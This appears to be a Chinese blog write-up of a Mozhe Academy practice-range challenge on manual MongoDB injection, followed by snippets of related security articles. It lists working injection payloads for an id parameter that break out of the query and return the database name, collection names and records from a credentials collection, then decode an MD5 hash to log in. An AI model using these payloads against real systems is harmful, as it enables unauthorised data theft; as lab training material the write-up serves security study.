SQL手工注入漏洞测试(MongoDB数据库)——墨者学院

于 2024-08-20 22:26:38 发布
阅读量273 收藏 5
点赞数 8
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/141369760
版权
1.启动靶场

2.寻找注入点

3.构造回显测试
new_list.php?id=1'});return ({title:'1',content:'2

4.查询当前数据库
new_list.php?id=1'});return({title:tojson(db),content:'2

 

5.查询数据库下的表名
new_list.php?id=1'});return({title:tojson(db.getCollectionNames()),content:'2

 表有:Authority_confidential、notice、system.indexes

6.查询Authority_confidential的数据
new_list.php?id=1'});return({title:tojson(db.Authority_confidential.find() [ 1 ] ),content:'2

 

7.MD5解码

8.登录,找key

通关!!!!

无敌的俊哥
关注
Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980)分析与利用
不忘初心,护天下安全!
06-24 2092
Spring Data for MongoDB是 Spring Data 项目的一部分,该项目旨在为新的数据存储提供熟悉和一致的基于Spring的编程模型,同时保留存储的特定特征和功能。 6月20日,VMware发布安全公告,修复了Spring Data MongoDB中的一个SpEL 表达式注入漏洞(CVE-2022-22980),该漏洞的CVSSv3评分为8.2。 Spring Data MongoDB应用程序在对包含查询参数占位符的SpEL表达式使用@Query或@Aggr
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 709
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
永远是少年
07-15 638
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库)。 一、题目简介 二、漏洞利用
MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
T1ngSh0w的博客
09-05 1505
MongoDB数据库注入-墨者学院-SQL手工注入漏洞测试(MongoDB数据库)详细讲解
mongodb 注入攻防
quguilai2006的专栏
08-22 1047
1,数组注入   此时的攻击利用了php可以传递数组参数的一个特性。 当传入的url为:http://127.0.0.1/2.php?username=test&password=test 执行了语句: db.test.find({username:'test',password:'test'}); 如果此时传入的url如下: http://127.0.0.1/2.php...
Mongodb注入
weixin_34249678的博客
01-06 347
0x01 Brief Description 作为nosql(not only sql)数据库的一种,mongodb很强大,很多企业也在用到。相对于sql数据库,nosql数据库有以下优点:简单便捷、方便拓展、更好的性能 0x02 Produce the vulnerability 漏洞环境搭建: kali2.0搭建的环境apt-get install mongodb,注意最好用aliyu...
数万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透
m0_63213529的博客
10-22 466
本篇文章是MongoDB数据库信息泄露漏洞复现,记录了实际中常见的MongoDB数据库未授权访问漏洞并如何使用,主要分为七个部分:MongoDB简介、MongoDB安装、MongoDB基本操作、MongoDB相关工具使用、MongoDB漏洞复现、MongoDB实战和MongoDB防御措施。 一、MongoDB基本介绍 MongoDB是一个高性能,开源,无模式的文档型数据库,是一个基于分布式文件存储的数据库,由C++编写。其中的数据以JSON格式文档的形式存储。MongoDB是一个介于关系数据库和非关..
墨者SQL手工注入漏洞测试(MongoDB数据库)题解
zr1213159840的博客
02-12 1853
题目的环境是Nginx+PHP+MongoDB。并且给了如下代码 在题目的考察知识点方面,说到了MD5值。 首先我们来打开链接,发现是用户登录界面(如果不是请稍等一会),然后和往常一样,点击那个通知,发现id的信息 我们读一下代码,在query这个部分,把id插入后,直接返回了查询的data。 用户输入的id的值没有经过任何转义就直接插入数据库中执行,在这个地方我们可以将id的值为 1'}); 这样查询语句就变成了 db.notice.find({'id':'1'})'}) 能看出后面的部分被过滤了
WEB漏洞-SQL注入之Oracle,MongoDB注入
硫酸超的博客
07-29 325
WEB漏洞-SQL注入之Oracle,MongoDB注入前言简要学习各种数据库注入特点Access手工注入数据库判断猜表猜字段猜数据工具注入mssql mysql 前言 简要学习各种数据库注入特点 数据库架构组成,数据库高权限操作 Access,Mysql,mssqlmongoDB,postgresqlsqlite,oracle,sybase等 Access 除了Access其他数据库组成架构基本都是大同小异。 access 表名 列名 数据 access数据库保存在网站源码下面,自己网站数据
sql漏洞注入,Oracle,MongoDB注入(15)
san3144393495的博客
04-22 417
这一对比就发现access数据比其他数据库要低一个等级,在搭建网站的时候access网站,数据会保存到网站源码下面,就在他网站源码下面,换一个网站也是access,他们是互不相干的没有关系,像我们之前提到过跨库注入,mysql下面就可能存在数据a,数据库b,就可以通过数据a获取到数据库b信息,access就没有,因为他的数据库是独立村存在的,每一个网站就是自己的,不和其它网站相关,没有任何关系。之后再猜,猜不出来了,就只能用工具去跑出来,列名实在不知道,跑出来是passwd。
nosql注入-mongodb
xdstuhq的博客
11-02 8691
mongodb数据库安全问题探究
万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透!,JDK8中HashMap依然会产生死循环问题
03-28 609
手绘了下图所示的kafka知识大纲流程图(xmind文件不能上传,导出图片展现),但都可提供源文件给每位爱学习的朋友,这个应该是靶场的问题。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透!
最新发布
2401_83916394的博客
04-19 608
每年转战互联网行业的人很多,说白了也是冲着高薪去的,不管你是即将步入这个行业还是想转行,学习是必不可少的。作为一个Java开发,学习成了日常生活的一部分,不学习你就会被这个行业淘汰,这也是这个行业残酷的现实。如果你对Java感兴趣,想要转行改变自己,那就要趁着机遇行动起来。或许,这份限量版的Java零基础宝典能够对你有所帮助。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
Apache Subversion Use-After-Free漏洞(CVE-2022-24070)
murphysec的博客
04-19 604
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
mongodb 监听不到端口_MongoDB操作&&注入漏洞&&未授权访问漏洞
weixin_39631370的博客
11-28 142
注入不止有传统的SQL数据库,NoSQL数据库也一样存在注入漏洞,在比赛中跟传统的注入相比也算新题型,不少同学可能还不太了解,本文向大家科普MongoDB数据库的常见操作以及攻击的方法——NoSQL注入和未授权访问MongoDB简介在MongoDB中,没有表、列的概念,取而代之的是集合(collection)、文档(document)库(DB):数据库,包含多个集合集合(Coll...
修复MongoDB 安全漏洞(CVE-2016-6494)
weixin_44848382的博客
02-18 2308
MongoDB 安全漏洞(CVE-2016-6494) 绿盟漏扫扫到了mongodb漏洞 解决方案: 可以考虑把mongodb升级到3.2的最新版本,参考: mongodb升级包下载: https://repo.mongodb.org/yum/redhat/7/mongodb-org/3.2/x86_64/RPMS/ 可以升级到3.2.22 升级步骤: 1、提前备份mongodb集群数据 登录mongodb集群中任一一台服务器上执行下面命令进行备份: 备份数据库: mongodump -h 127.0.0.
MongoDB注入:如何攻击MongoDB
Truong的专栏
04-18 8284
不管是商业项目还是个人项目,MongoDB都是一个非常好的数据库引擎,国内很多公司也开始用MongoDB。比起传统的数据库,这款数据库比较新,也有很多安全问题是大家还没有意识到的,而这些问题通常可以打得你措手不及。 本篇文章主要向大家介绍我在使用MongoDB的过程中遇到的问题,以及它是如何被用来修改数据库记录的。当然,利用过程很简单,不过其实各种方式的SQL注入技术说破了也就那么回事,但是
mongodb 实验——数据库优化
04-28
好的,我可以帮你解答有关 MongoDB 数据库优化的问题。请问你需要了解哪些方面的优化? 一般来说,MongoDB 数据库优化可以从以下几个方面入手: 1. 索引优化:索引是提高 MongoDB 查询效率的关键。可以通过创建合适的索引、合理使用复合索引等方式达到优化的目的。 2. 数据库设计优化:合理的数据库设计可以提高 MongoDB 查询效率和数据操作效率,包括数据模型设计、数据集合设计等。 3. 系统配置优化:针对 MongoDB 服务器的硬件配置、操作系统配置等进行优化,如合理配置内存、磁盘等参数。 4. 查询优化:合理使用查询语句,减少查询次数和查询数据量,提高查询效率。 5. 安全性优化:进行安全性设置,防止 MongoDB 数据库被攻击或数据泄露。 希望以上回答能够帮到你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值